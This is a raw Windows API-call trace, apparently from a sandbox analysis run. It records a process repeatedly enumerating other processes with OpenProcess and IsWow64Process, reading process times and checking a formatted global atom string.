	[0115.294] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0115.370] CloseHandle (hObject=0x698) returned 1
	[0115.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0115.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0115.370] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.370] CloseHandle (hObject=0x698) returned 1
	[0115.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0115.371] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.371] CloseHandle (hObject=0x698) returned 1
	[0115.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0115.371] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.371] CloseHandle (hObject=0x698) returned 1
	[0115.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0115.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0115.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0115.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0115.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0115.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0115.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0115.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0115.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0115.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0115.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0115.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0115.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0115.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0115.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0115.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0115.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0115.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0115.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0115.418] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.418] CloseHandle (hObject=0x698) returned 1
	[0115.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0115.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0115.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0115.418] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.418] CloseHandle (hObject=0x698) returned 1
	[0115.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0115.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0115.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.419] CloseHandle (hObject=0x698) returned 1
	[0115.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0115.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.419] CloseHandle (hObject=0x698) returned 1
	[0115.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0115.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.419] CloseHandle (hObject=0x698) returned 1
	[0115.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0115.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.419] CloseHandle (hObject=0x698) returned 1
	[0115.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0115.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.419] CloseHandle (hObject=0x698) returned 1
	[0115.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0115.420] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.420] CloseHandle (hObject=0x698) returned 1
	[0115.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0115.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0115.420] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.420] CloseHandle (hObject=0x698) returned 1
	[0115.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0115.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.421] CloseHandle (hObject=0x698) returned 1
	[0115.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0115.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.421] CloseHandle (hObject=0x698) returned 1
	[0115.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0115.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.421] CloseHandle (hObject=0x698) returned 1
	[0115.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0115.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.421] CloseHandle (hObject=0x698) returned 1
	[0115.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0115.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.422] CloseHandle (hObject=0x698) returned 1
	[0115.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0115.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.422] CloseHandle (hObject=0x698) returned 1
	[0115.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0115.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.422] CloseHandle (hObject=0x698) returned 1
	[0115.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0115.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.422] CloseHandle (hObject=0x698) returned 1
	[0115.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0115.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.423] CloseHandle (hObject=0x698) returned 1
	[0115.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0115.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.423] CloseHandle (hObject=0x698) returned 1
	[0115.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0115.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.427] CloseHandle (hObject=0x698) returned 1
	[0115.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0115.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.428] CloseHandle (hObject=0x698) returned 1
	[0115.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0115.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.428] CloseHandle (hObject=0x698) returned 1
	[0115.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0115.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.428] CloseHandle (hObject=0x698) returned 1
	[0115.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0115.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.429] CloseHandle (hObject=0x698) returned 1
	[0115.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0115.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.429] CloseHandle (hObject=0x698) returned 1
	[0115.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0115.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.429] CloseHandle (hObject=0x698) returned 1
	[0115.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0115.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.429] CloseHandle (hObject=0x698) returned 1
	[0115.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0115.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.430] CloseHandle (hObject=0x698) returned 1
	[0115.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0115.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.430] CloseHandle (hObject=0x698) returned 1
	[0115.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0115.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.430] CloseHandle (hObject=0x698) returned 1
	[0115.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.430] CloseHandle (hObject=0x698) returned 1
	[0115.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.431] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.431] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0115.431] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0115.431] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0115.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.439] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0115.448] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.448] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0115.448] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0115.448] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0115.448] CloseHandle (hObject=0x698) returned 1
	[0115.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0115.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0115.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.449] CloseHandle (hObject=0x698) returned 1
	[0115.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0115.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.449] CloseHandle (hObject=0x698) returned 1
	[0115.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0115.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.449] CloseHandle (hObject=0x698) returned 1
	[0115.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0115.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0115.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0115.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0115.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0115.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0115.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0115.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0115.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0115.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0115.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0115.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0115.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0115.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0115.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0115.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0115.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0115.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0115.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0115.526] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.526] CloseHandle (hObject=0x698) returned 1
	[0115.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0115.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0115.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0115.526] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.526] CloseHandle (hObject=0x698) returned 1
	[0115.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0115.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0115.527] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.527] CloseHandle (hObject=0x698) returned 1
	[0115.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0115.527] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.527] CloseHandle (hObject=0x698) returned 1
	[0115.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0115.527] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.527] CloseHandle (hObject=0x698) returned 1
	[0115.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0115.527] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.527] CloseHandle (hObject=0x698) returned 1
	[0115.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0115.527] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.527] CloseHandle (hObject=0x698) returned 1
	[0115.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0115.528] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.528] CloseHandle (hObject=0x698) returned 1
	[0115.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0115.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0115.528] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.528] CloseHandle (hObject=0x698) returned 1
	[0115.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0115.528] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.528] CloseHandle (hObject=0x698) returned 1
	[0115.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0115.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.529] CloseHandle (hObject=0x698) returned 1
	[0115.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0115.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.529] CloseHandle (hObject=0x698) returned 1
	[0115.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0115.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.529] CloseHandle (hObject=0x698) returned 1
	[0115.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0115.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.529] CloseHandle (hObject=0x698) returned 1
	[0115.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0115.529] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.529] CloseHandle (hObject=0x698) returned 1
	[0115.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0115.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.530] CloseHandle (hObject=0x698) returned 1
	[0115.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0115.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.530] CloseHandle (hObject=0x698) returned 1
	[0115.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0115.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.530] CloseHandle (hObject=0x698) returned 1
	[0115.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0115.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.530] CloseHandle (hObject=0x698) returned 1
	[0115.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0115.530] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.530] CloseHandle (hObject=0x698) returned 1
	[0115.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0115.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.531] CloseHandle (hObject=0x698) returned 1
	[0115.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0115.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.531] CloseHandle (hObject=0x698) returned 1
	[0115.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0115.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.531] CloseHandle (hObject=0x698) returned 1
	[0115.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0115.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.531] CloseHandle (hObject=0x698) returned 1
	[0115.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0115.531] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.531] CloseHandle (hObject=0x698) returned 1
	[0115.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0115.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.532] CloseHandle (hObject=0x698) returned 1
	[0115.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0115.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.532] CloseHandle (hObject=0x698) returned 1
	[0115.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0115.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.532] CloseHandle (hObject=0x698) returned 1
	[0115.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0115.532] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.532] CloseHandle (hObject=0x698) returned 1
	[0115.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0115.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.533] CloseHandle (hObject=0x698) returned 1
	[0115.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.533] CloseHandle (hObject=0x698) returned 1
	[0115.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.533] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.533] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0115.534] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0115.534] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0115.534] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.534] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0115.534] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.535] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0115.535] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0115.535] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0115.611] CloseHandle (hObject=0x698) returned 1
	[0115.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0115.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0115.612] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.612] CloseHandle (hObject=0x698) returned 1
	[0115.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0115.612] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.612] CloseHandle (hObject=0x698) returned 1
	[0115.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0115.612] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.612] CloseHandle (hObject=0x698) returned 1
	[0115.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0115.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0115.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0115.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0115.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0115.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0115.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0115.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0115.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
